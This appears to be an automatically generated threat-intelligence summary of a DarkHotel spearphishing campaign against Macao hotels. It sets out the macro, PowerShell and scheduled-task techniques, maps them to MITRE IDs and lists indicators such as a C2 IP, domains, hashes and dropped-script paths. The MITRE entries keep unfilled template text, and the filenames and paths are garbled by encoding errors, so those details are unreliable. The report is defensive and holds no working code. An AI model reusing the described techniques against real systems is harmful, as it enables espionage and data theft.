Threat researchers describe a first-stage spearphishing campaign targeting luxury hotels in Macao that used a password-protected Excel file with macros to drop and execute further payloads via scheduled tasks and PowerShell. The operation, attributed to DarkHotel, employed a hard-coded C2 domain impersonating a government site (fsm-gov.com) and targeted hotels such as Grand Coloane Resort and Wynn Palace. #DarkHotel #Macao
Keypoints
- The attack began with a spearphishing email to hotel management staff, containing an Excel attachment named δΏ‘ζ―.xls (information.xls).
- The Excel file contains macros that trigger during opening and perform multiple stages of credential and data handling, including data exfiltration.
- Macros use a Living Off the Land technique (PowerShell) to communicate with the C2 server and drop additional payloads.
- One macro approach involves creating a scheduled task via a COM object to run scripts and exfiltrate data while attempting to hide traces (e.g., deleting created files).
- The C2 infrastructure includes a hard-coded domain, FSM-GOV.com, impersonating a Micronesia government site, with the IP 23.111.184.119 hosting related content.
- Hotels targeted include Grand Coloane Resort and Wynn Palace, with motives tied to potential espionage and event-related reconnaissance.
- Macao authorities issued alerts about the phishing domain and the campaign, linking it to suspected DarkHotel activity and cautioning the public.
MITRE Techniques
- [T1566.001] Spearphishing Attachment β Brief description of how it was used. Quote relevant content using bracket (‘The attack began with a spearphishing email to hotel management staff, containing an Excel attachment named δΏ‘ζ―.xls (information.xls).’)
- [T1204.002] Malicious File β Brief description of how it was used. Quote relevant content using bracket (‘The Excel file contains macros that trigger during opening and perform multiple stages of credential and data handling, including data exfiltration.’)
- [T1059.005] Visual Basic β Brief description of how it was used. Quote relevant content using bracket (‘The Excel file contains macros that trigger during opening and perform multiple stages of credential and data handling, including data exfiltration.’)
- [T1070.004] File Deletion β Brief description of how it was used. Quote relevant content using bracket (‘e.g., deleting created files’)
- [T1106] Native API β Brief description of how it was used. Quote relevant content using bracket (‘One macro approach involves creating a scheduled task via a COM object to run scripts and exfiltrate data.’)
- [T1053] Scheduled Task β Brief description of how it was used. Quote relevant content using bracket (‘One macro approach involves creating a scheduled task via a COM object to run scripts and exfiltrate data.’)
- [T1064] Scripting β Brief description of how it was used. Quote relevant content using bracket (‘The Excel file contains macros that trigger during opening and perform multiple stages of credential and data handling, including data exfiltration.’)
- [T1059.001] PowerShell β Brief description of how it was used. Quote relevant content using bracket (‘Macros use a Living Off the Land technique (PowerShell) to communicate with the C2 server and drop additional payloads.’)
- [T1071] Standard Application Layer Protocol β Brief description of how it was used. Quote relevant content using bracket (‘Macros use a Living Off the Land technique (PowerShell) to communicate with the C2 server and drop additional payloads.’)
Indicators of Compromise
- [IP] 23.111.184.119 β C2 infrastructure used for system information exfiltration
- [Domain] fsm-gov.com β C2 domain used for command and control
- [Domain] fsmgov.org β Real Micronesia government domain referenced for context
- [Hash] a251ac8cec78ac4f39fc5536996bed66c3436f8c16d377922187ea61722c71f8 β first Excel sample payload
- [Hash] 163c386598e1826b0d81a93d2ca0dc615265473b66d4521c359991828b725c14 β second Excel sample payload
- [File Name] δΏ‘ζ―.xls β initial phishing attachment name
- [File Path] C:UsersUSERAppDataRoamingMicrosoftWindowsprcjobs.vbs β dropped script location
- [File Path] System32SyncappvpublishingServer.vbs β script used to bypass trusted-script execution
Β